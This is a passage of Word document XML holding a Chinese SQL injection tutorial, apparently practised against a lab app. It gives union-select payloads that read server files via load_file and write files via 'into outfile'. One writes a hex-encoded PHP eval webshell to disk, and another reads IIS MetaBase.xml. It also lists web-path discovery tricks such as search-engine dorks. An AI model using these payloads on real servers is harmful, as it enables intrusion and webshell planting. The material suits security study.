        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,load_file(0x633A5C5C626F6F742E696E69)+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7366F6" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRDefault="003C5A05" w:rsidP="003C5A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="003C5A05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2260662F" wp14:editId="673CE2F4">
            <wp:extent cx="5274310" cy="2713259"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2713259"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7241DF6E" w14:textId="77777777" w:rsidR="008D73E8" w:rsidRDefault="008D73E8" w:rsidP="003C5A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想对服务器进行写操作，直接用下用这条语句进行操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642566BC" w14:textId="77777777" w:rsidR="008D73E8" w:rsidRDefault="008D73E8" w:rsidP="008D73E8">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7%20union%20select%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'568311803'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2 into outfile 'c:/muma.txt'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E32A2B" w14:textId="77777777" w:rsidR="004070D3" w:rsidRDefault="004070D3" w:rsidP="004070D3">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写个一句话试试：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD56E5D" w14:textId="77777777" w:rsidR="004070D3" w:rsidRDefault="004070D3" w:rsidP="004070D3">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7%20union%20select%20</w:t>
      </w:r>
      <w:r w:rsidRPr="004070D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x3C3F70687020406576616C28245F504F53545B2763686F70706572275D293B3F3E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2 into outfile 'c:/muma.txt'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F7CF36" w14:textId="77777777" w:rsidR="004070D3" w:rsidRDefault="004070D3" w:rsidP="004070D3">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为什么要把一句话木马转化为十六进制，因为一句话木马里面也有单引号，再用单引号引起来会</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>容易造成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>混</w:t>
      </w:r>
      <w:r w:rsidR="006633D7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>淆</w:t>
      </w:r>
      <w:r w:rsidR="00767332">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以得出结论：如果用</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5" w:rsidRPr="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码就不要用单引号，</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5" w:rsidRPr="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>单引号</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5" w:rsidRPr="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不要</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5" w:rsidRPr="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编码</w:t>
      </w:r>
      <w:r w:rsidR="00513CF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D513F8" w14:textId="77777777" w:rsidR="00274333" w:rsidRPr="00CD76A0" w:rsidRDefault="00274333" w:rsidP="008D73E8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A6C0AA2" w14:textId="77777777" w:rsidR="008D73E8" w:rsidRPr="00210DFA" w:rsidRDefault="008D73E8" w:rsidP="003C5A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE08DF0" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRPr="003C5A05" w:rsidRDefault="003C5A05" w:rsidP="003C5A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB22D04" w14:textId="77777777" w:rsidR="00576FC8" w:rsidRPr="00576FC8" w:rsidRDefault="00576FC8" w:rsidP="00FD3D32">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0075E3F9" w14:textId="77777777" w:rsidR="00EE78D6" w:rsidRPr="00CD0072" w:rsidRDefault="003B4D81" w:rsidP="00200887">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六</w:t>
      </w:r>
      <w:r w:rsidR="00FA2981">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00DA3D3E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>怎么</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD0072">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD0072">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD0072">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B7820D" w14:textId="77777777" w:rsidR="00DA3D3E" w:rsidRDefault="00DA3D3E"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不管是root权限还是普通用户权限</w:t>
      </w:r>
      <w:r w:rsidR="00286661">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>要对服务器进行读写我们需要网站路径才能得到webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C050836" w14:textId="77777777" w:rsidR="007073CC" w:rsidRDefault="007073CC"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1)</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一般可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在变量后面加上单引号、改变参数类型、增加参数位数等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来造成</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MySQL数据库出错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>爆出Web物理路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818DC9A" w14:textId="77777777" w:rsidR="007073CC" w:rsidRDefault="007073CC"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2）通过扫描器扫web服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>遗留文件 php.php</w:t>
      </w:r>
      <w:r w:rsidR="00EF612A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>info.php</w:t>
      </w:r>
      <w:r w:rsidR="00EF612A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:r w:rsidR="00EF612A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="007073CC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>test.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3E9BE" w14:textId="77777777" w:rsidR="007073CC" w:rsidRPr="00CD76A0" w:rsidRDefault="007073CC" w:rsidP="007073CC">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3）</w:t>
      </w:r>
      <w:r w:rsidR="00EE78D6" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用搜索引擎来查找Web目录。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>搜索引擎有时候会对网站页面进行快照抓取，包括脚本出错页面，因此可利用搜索引擎查找网站的出错信息，从而获得网站的物理路径。可在Google或百度中搜索“mysql site:***.com”或“warning</w:t>
      </w:r>
      <w:r w:rsidR="006D615F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>site:***.com,error site:***.com.cn”等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BB0A24" w14:textId="77777777" w:rsidR="00EE78D6" w:rsidRDefault="007073CC"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里使用“error site:***.com”关键字进行查询，从搜索结果中得到了网站的物理路径为“E:\pujing2015”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A810B67" w14:textId="77777777" w:rsidR="00A55407" w:rsidRDefault="00A55407"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4)</w:t>
      </w:r>
      <w:r w:rsidR="008A7D1E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 漏洞暴路径，例如通过网站后台查看网站Web路径、CC攻击暴路径等.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039F3FDE" w14:textId="77777777" w:rsidR="00C12799" w:rsidRDefault="008A7D1E"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6)通过配置文件找网站路径,</w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在百度里面输入***配置文件,如:IIS6.0配置文件，可以找到:</w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C" w:rsidRPr="00C84D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C:\</w:t>
      </w:r>
      <w:r w:rsidR="00C05FB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WINDOWS\</w:t>
      </w:r>
      <w:r w:rsidR="00C05FB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>system32\</w:t>
      </w:r>
      <w:r w:rsidR="00C05FB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00C84D8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>inetsrv\</w:t>
      </w:r>
      <w:r w:rsidR="00C05FB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00DD0464" w:rsidRPr="00DD0464">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MetaBase.xml</w:t>
      </w:r>
      <w:r w:rsidR="00F6727E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07E7A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00F6727E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C:\WINDOWS\system32\inetsrv\MetaBase.bin</w:t>
      </w:r>
      <w:r w:rsidR="00F6727E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F6727E" w:rsidRPr="00A756EA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这两个配置文件</w:t>
      </w:r>
      <w:r w:rsidR="00B07E7A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（小技巧:在百度里面输入:load_file()常用敏感信息，就可以找到别人入侵过程中总结的常用敏感文件路径）</w:t>
      </w:r>
      <w:r w:rsidR="00C12799">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61EC23" w14:textId="77777777" w:rsidR="00210DFA" w:rsidRDefault="00210DFA"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7%20union%20select%201,load_file(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C:\</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WINDOWS\</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system32</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inetsrv</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w:t>
      </w:r>
      <w:r w:rsidR="00DD0464" w:rsidRPr="00DD0464">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MetaBase.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AACAEF1" w14:textId="77777777" w:rsidR="00266A9C" w:rsidRPr="0023225A" w:rsidRDefault="00266A9C"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14:anchorId="25DB883A" wp14:editId="7205EDE3">
            <wp:extent cx="5278120" cy="4328589"/>
            <wp:effectExtent l="1905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278120" cy="4328589"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
